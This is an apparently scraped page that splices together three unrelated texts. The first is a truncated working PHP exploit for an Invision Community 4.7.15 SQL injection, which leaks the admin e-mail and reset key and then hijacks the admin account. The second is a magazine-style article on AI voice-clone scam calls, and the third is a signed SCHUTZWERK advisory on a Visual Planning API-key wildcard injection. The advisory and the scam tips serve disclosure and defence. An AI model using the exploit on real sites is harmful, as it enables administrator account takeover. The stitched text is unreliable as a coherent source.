  $min = true;  
  $idx = 1;

  while(1)  
  {  
    $test = 256;

    for ($i = 7; $i >= 0; $i--)  
    {  
      $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i));  
      $injection = "` ON 1 UNION SELECT IF(ORD(SUBSTR(({$sql}),{$idx},1))<{$test},1,SLEEP({$sec})) OR ?=?#";  
      curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf("cat=1&filter[%s]=1", rawurlencode($injection)));  
      $start = time(); curl_exec($ch); $secs = time() - $start;  
      $min = ($secs < $sec);  
    }

    if (($chr = $min ? ($test - 1) : ($test)) == 0) break;  
    $data .= chr($chr); $min = true; $idx++;  
    print "\r[*] Data: {$data}";  
  }

  return $data;  
}

print "[+] Step 1: fetching admin's e-mail address\n";

$email = sql_injection("SELECT email FROM core_members WHERE member_id=1");

print "\n[+] Step 2: go to {$url}index.php?/lostpassword/ and request a password reset by using the above e-mail. When you're done press enter.";

fgets(STDIN);

print "[+] Step 3: fetching the password reset key\n";

$vid = sql_injection("SELECT vid FROM core_validating WHERE member_id=1 AND lost_pass=1 ORDER BY entry_date DESC LIMIT 1");

print "\n[+] Step 4: taking over the admin account by resetting their password\n";

@unlink('./cookies.txt');

curl_setopt($ch, CURLOPT_URL, "{$url}index.php?/lostpassword/");  
curl_setopt($ch, CURLOPT_POST, false);  
curl_setopt($ch, CURLOPT_HEADER, true);  
curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt');  
curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt');

if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");

$passwd = md5(time());  
$params = "do=validate&vid={$vid}&mid=1&password={$passwd}&password_confirm={$passwd}&resetpass_submitted=1&csrfKey={$csrf[1]}";

curl_setopt($ch, CURLOPT_POSTFIELDS, $params);

if (!preg_match("/301 Moved Permanently/i", curl_exec($ch))) die("[-] Attack failed!\n");

print "[+] Done! You can log into the AdminCP with {$email}:{$passwd}\n";

Invision Community 4.7.15 SQL Injection

AI tools are getting better at cloning people’s voices, and scammers are using these new capabilities to commit fraud. Avoid getting swindled by following these expert tips.

You answer a random call from a family member, and they breathlessly explain how there’s been a horrible car accident. They need you to send money right now, or they’ll go to jail. You can hear the desperation in their voice as they plead for an immediate cash transfer. While it sure sounds like them, and the call came from their number, you feel like something’s off. So, you decide to hang up and call them right back. When your family member picks up your call, they say there hasn’t been a car crash, and that they have no idea what you’re talking about.

Congratulations, you just successfully avoided an artificial intelligence scam call.

As generative AI tools get more capable, it is becoming easier and cheaper for scammers to create fake—but convincing—audio of people’s voices. These AI voice clones are trained on existing audio clips of human speech, and can be adjusted to imitate almost anyone. The latest models can even speak in numerous languages. OpenAI, the maker of ChatGPT, recently announced a new text-to-speech model that could further improve voice cloning and make it more widely accessible.

Of course, bad actors are using these AI cloning tools to trick victims into thinking they are speaking to a loved one over the phone, even though they’re talking to a computer. While the threat of AI-powered scams can be frightening, you can stay safe by keeping these expert tips in mind the next time you receive an urgent, unexpected call.

**Remember That AI Audio Is Hard to Detect**

It’s not just OpenAI; many tech startups are working on replicating near perfect-sounding human speech, and the recent progress is rapid. “If it were a few months ago, we would have given you tips on what to look for, like pregnant pauses or showing some kind of latency,” says Ben Colman, cofounder and CEO of Reality Defender. Like many aspects of generative AI over the past year, AI audio is now a more convincing imitation of the real thing. Any safety strategies that rely on you audibly detecting weird quirks over the phone are outdated.

**Hang Up and Call Back**

Security experts warn that it’s quite easy for scammers to make it appear as if the call were coming from a legitimate phone number. “A lot of times scammers will spoof the number that they're calling you from, make it look like it's calling you from that government agency or the bank,” says Michael Jabbara, global head of fraud services at Visa. “You have to be proactive.” Whether it’s from your bank or from a loved one, any time you receive a call asking for money or personal information, go ahead and ask to call them back. Look up the number online or in your contacts, and initiate a follow-up conversation. You can also try sending them a message through a different, verified line of communication like video chat or email.

**Create a Secret Safe Word**

A popular security tip that multiple sources suggested was to craft a safe word that only you and your loved ones know about, and which you can ask for over the phone. “You can even prenegotiate with your loved ones a word or a phrase that they could use in order to prove who they really are, if in a duress situation,” says Steve Grobman, chief technology officer at McAfee. Although calling back or verifying via another means of communication is best, a safe word can be especially helpful for young ones or elderly relatives who may be difficult to contact otherwise.

**Or Just Ask What They Had for Dinner**

What if you don’t have a safe word decided on and are trying to suss out whether a distressing call is real? Pause for a second and ask a personal question. “It could even be as simple as asking a question that only a loved one would know the answer to,” says Grobman. “It could be, ‘Hey, I want to make sure this is really you. Can you remind me what we had for dinner last night?’” Make sure the question is specific enough that a scammer couldn’t answer correctly with an educated guess.

**Understand Any Voice Can Be Mimicked**

Deepfake audio clones aren’t just reserved for celebrities and politicians, like the calls in New Hampshire that used AI tools to sound like Joe Biden and to discourage people from going to the polls. “One misunderstanding is, ‘It cannot happen to me. No one can clone my voice,’” says Rahul Sood, chief product officer at Pindrop, a security company that discovered the likely origins of the AI Biden audio. “What people don’t realize is that with as little as five to 10 seconds of your voice, on a TikTok you might have created or a YouTube video from your professional life, that content can be easily used to create your clone.” Using AI tools, the outgoing voicemail message on your smartphone might even be enough to replicate your voice.

**Don’t Give in to Emotional Appeals**

Whether it’s a pig butchering scam or an AI phone call, experienced scammers are able to build your trust in them, create a sense of urgency, and find your weak points. “Be wary of any engagement where you’re experiencing a heightened sense of emotion, because the best scammers aren’t necessarily the most adept technical hackers,” says Jabbara. “But they have a really good understanding of human behavior.” If you take a moment to reflect on a situation and refrain from acting on impulse, that could be the moment you avoid getting scammed.

AI Scam Calls: How to Protect Yourself, How to Detect

A wildcard injection inside a prepared SQL statement was found in an undocumented Visual Planning 8 REST API route. The combination of fuzzy matching (via LIKE operator) and user-controlled input allows exfiltrating the REST API key based on distinguishable server responses. If exploited, attackers are able to gain administrative access to the REST API version 2.0.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Title  
=====

SCHUTZWERK-SA-2023-003: Authentication Bypass in Visual Planning REST API

Status  
======

PUBLISHED

Version  
=======

1.0

CVE reference  
=============

CVE-2023-49231

Link  
====

https://www.schutzwerk.com/advisories/schutzwerk-sa-2023-003/

Text-only version:  
https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2023-003.txt

Affected products/vendor  
========================

All versions prior to Visual Planning 8 (Build 240207) by STILOG I.S.T.

Summary  
=======

A wildcard injection inside a prepared SQL statement was found in an   
undocumented Visual Planning[0] 8 REST API route. The combination of   
fuzzy matching (via LIKE operator) and user-controlled input allows   
exfiltrating the REST API key based on distinguishable server responses.   
If exploited, attackers are able to gain administrative access to the   
REST API v2.0.

Risk  
====

The vulnerability allows attackers to obtain a valid API key for the   
Visual Planning REST API v2.0. With such a key, attackers can use   
corresponding endpoints to exfiltrate company data or upload/download   
files. If no external user management (e.g. LDAP) is configured, the API   
key can also be used for user management tasks including the creation of   
administrative users. Since administrators are allowed to upload modules   
using the Visual Planning Admin Center, a compromise of the underlying   
server is likely.

Description  
===========

During a recent red teaming assessment, Visual Planning was identified   
as part of the customers internet-facing assets. The software is   
developed by STILOG I.S.T. and provides resource management and   
scheduling features. A security assessment conducted by SCHUTZWERK found   
an authentication bypass in Visual Planning's administrative REST API   
v2.0.[1]

Corresponding API routes are implemented in the PlanningWSRestV2.java   
file. A comparison between the documentation and implemented routes   
revealed an undocumented route (documentation accessed on 2024-03-05),   
which is externally reachable via a GET request to the /session endpoint.

The following code snippet shows the corresponding undocumented route,   
which takes the value of the apikey header as an argument:

vp.jar.src/com/visualplanning/webservice/PlanningWSRestV2.java  
/*      */   @GET  
/*      */   @Path("/session")  
/*      */   public Response openSession(@HeaderParam("apikey") String   
apikey, @HeaderParam("keepalive") String keepalive) {  
/*  123 */     if (apikey == null || apikey.trim().isEmpty()) {  
/*  124 */       return   
WSResponse.instance().errorApikey((Response.StatusType)Response.Status.FORBIDDEN,   
apikey);  
/*      */     }  
/*      */  
/*  127 */     WSSession session = WSSession.existsSession(apikey);  
/*  128 */     if (session != null) {  
/*  129 */       return   
WSResponse.instance().error((Response.StatusType)Response.Status.FORBIDDEN,   
"Already opened session for apikey : ", apikey);  
/*      */     }  
/*      */  
/*  132 */     if (WSSession.getSession(apikey, (keepalive != null &&   
Boolean.parseBoolean(keepalive) == true)) == null) {  
/*  133 */       return   
WSResponse.instance().errorApikey((Response.StatusType)Response.Status.FORBIDDEN,   
apikey);  
/*      */     }  
/*  135 */     return WSResponse.instance().success("WSSession created   
for apikey : " + apikey);  
/*      */   }

Line 132 shows a call to the getSession(apikey, ...) method of the   
WSSession class. Subsequently, the getSession(..) method will call the   
makeSession(apikey, ..) method of the same class.

The following code snippet shows the makeSession(..) method. Line 646   
contains the vulnerable prepared SQL statement, which is prone to   
wildcard injections[2] due to the usage of the LIKE operator in   
combination with user-controlled input:

vp.jar.src/com/visualplanning/webservice/WSSession.java  
/*      */   private static WSSession makeSession(String apiKey,   
WSSessionType type) {  
/*  634 */     WSSession wsSession = new WSSession();  
/*  635 */     WebApplicationContext applicationContext =   
WebApplicationContext.getDefaultApplication();  
/*  636 */     UserSession userSession =   
applicationContext.createUserSession();  
/*      */  
/*  638 */     DBConnection connection =   
applicationContext.createUserSession().getDBConnection();  
/*  639 */     String databaseName =   
applicationContext.getProperty("Application", "Databasename",   
"VisualPlanning7");  
/*      */  
/*  641 */     connection.setPoolMode(false);  
/*  642 */     connection.setDatabase(databaseName);  
/*      */  
/*      */     try {  
/*  645 */       if (type == WSSessionType.CLIENT) {  
/*  646 */         String planningQuery = "SELECT XMLContent FROM   
Planning WHERE XMLContent LIKE ?";  
/*  647 */         PreparedStatement stmt =   
connection.createPreparedStatement(planningQuery);  
/*  648 */         stmt.setString(1, "%<APIKey>" + apiKey + "</APIKey>%");  
/*  649 */         ResultSet rs = stmt.executeQuery();  
/*      */  
/*  651 */         if (!rs.next()) {  
/*  652 */           return null;  
/*      */         }

The following GET request demonstrates the behavior of injecting a   
percent sign as wildcard character:

GET /vplanning/api/v2/session HTTP/1.1  
Host: vp-host  
apikey: %  
[..]

The server will respond with a success message, indicating that a   
session was created for the used API key:

HTTP/1.1 200  
[..]

WSSession created for apikey : %

Further tests showed that an apikey header payload of '1%' will result   
in a similar success response, if the api key starts with the character   
'1'. A payload with a different non-matching first apikey character like   
'2%' will result in a status code 403 and the error message 'Invalid API   
key (2%)'.

The proof-of-concept script brute_vp_apikey.py[3] was developed in order   
to automate the process of exfiltrating the full apikey. The script can   
be executed as follows against a vulnerable Visual Planning instance and   
to extract the administrative api key:

$ python3 brute_vp_apikey.py --url http://127.0.0.1:8080  
Visual Planning API Key: 79d4add3-6995-8cae-976b-4aaaddd90616

Solution/Mitigation  
===================

The vendor suggests to update to Visual Planning 8 (Build 240207)

Disclosure timeline  
===================

2023-11-01: Vulnerability discovered  
2023-11-09: Contact vendor in order to determine security contact  
2023-11-10: Received generic sales response from vendor  
2023-11-14: Contacted CTO of vendor directly  
2023-11-16: Vulnerabilities demonstrated in call with contact at vendor  
2023-11-24: CVE assigned by Mitre  
2023-11-24: Additional technical details provided to vendor  
2023-12-19: Vendor informed SCHUTZWERK that work on fixing the findings   
is in progress  
2024-01-30: Inquired about mitigation status regarding the reported   
vulnerabilities  
2024-01-30: Vendor informed SCHUTZWERK that some of the issues were   
already fixed  
2024-03-08: Sent advisory drafts to vendor  
2024-03-28: Received patch information and release of advisory

Contact/Credits  
===============

The vulnerability was discovered by Lennert Preuth of SCHUTZWERK GmbH.

References  
==========

[0] https://www.visual-planning.com/en/  
[1]   
https://app.swaggerhub.com/apis-docs/VisualPlanning/visual-planning_api_rest_v_2_0_us/2.0-oas3  
[2]   
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection#sql-wildcard-injection  
[3] https://www.schutzwerk.com/en/43/assets/advisories/brute_vp_apikey.py

Disclaimer  
==========

The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may   
be updated in order to provide as accurate information as possible. The   
most recent version of this security advisory can be found at SCHUTZWERK   
GmbH's website ( https://www.schutzwerk.com ).

Additional information  
======================

SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/

SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/  
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmYF0QkaHGFkdmlzb3Jp  
ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrvAZhAArh5MI5kM1lTjcIPPMiDS  
VXJ51Z39qgcXySyrqrKslnP/2a/pfpakD8g161oOTSK/tt9Yd6L/6O5Vywe7Kx5V  
lkVw7bs9J0WCY8aYzJ9RxdALt7HexAG+USgbjFWFajdSNNJ8giBu3P3ZCE8/GbHJ  
0bKd8AN88NKL954olnI6qGbbnOr/QXWuIOWAYF9wXLgEk992hszYgt7SJIrFHuX6  
2TC4iWOv4+72HQiQ8QYXCAZZVBDr3mUPQRBSJ9AZ3x7mxtJtMg8DyW0OATNe9Qlq  
IUO7HFqrPwTQmFKf9whk8QD7/Y9dKTpAjlVzvXe49COqbjOzxmIe7muxwyVlOrqO  
J9ZqreOr/ENLUgYDBaTLSTAHdEFNeqRGPK3dG0yiRSi3dtavJwr8PN1L52qTqLzT  
C+Yrruu6Ac6pSin1Ea9WaXF+YS1ErRcbZxkRD5pS4s6V4NMkV4bDWlDtraQ0rDfL  
AA+TxtA25p34S2MV/b3qAiA66UjrXEb6IJVNx4Rx7X3+gcLgI2w7t3DQEVuPaB3k  
ltT1oV6ei7tqeQpn7usHzlfa6lq7Q3PIRpxYAo0g4kp4cVVblLRNWDpZMK+cBj1N  
MrGP2f50gbpYej/yYHsXNU2pMfbUPoSq3X8uwVCoLvaBSBWx7I3TM1hl0/3wBi/w  
phO+Bauh2QYGX2mFw/mduZM=  
=ycwQ  
-----END PGP SIGNATURE-----

--   
SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany  
Zertifiziert / Certified ISO 27001, 9001 and TISAX

Phone +49 731 977 191 0

advisories@schutzwerk.com / www.schutzwerk.com

Geschäftsführer / Managing Directors:  
Jakob Pietzka, Michael Schäfer

Amtsgericht Ulm / HRB 727391  
Datenschutz / Data Protection www.schutzwerk.com/datenschutz

Tag

#ssl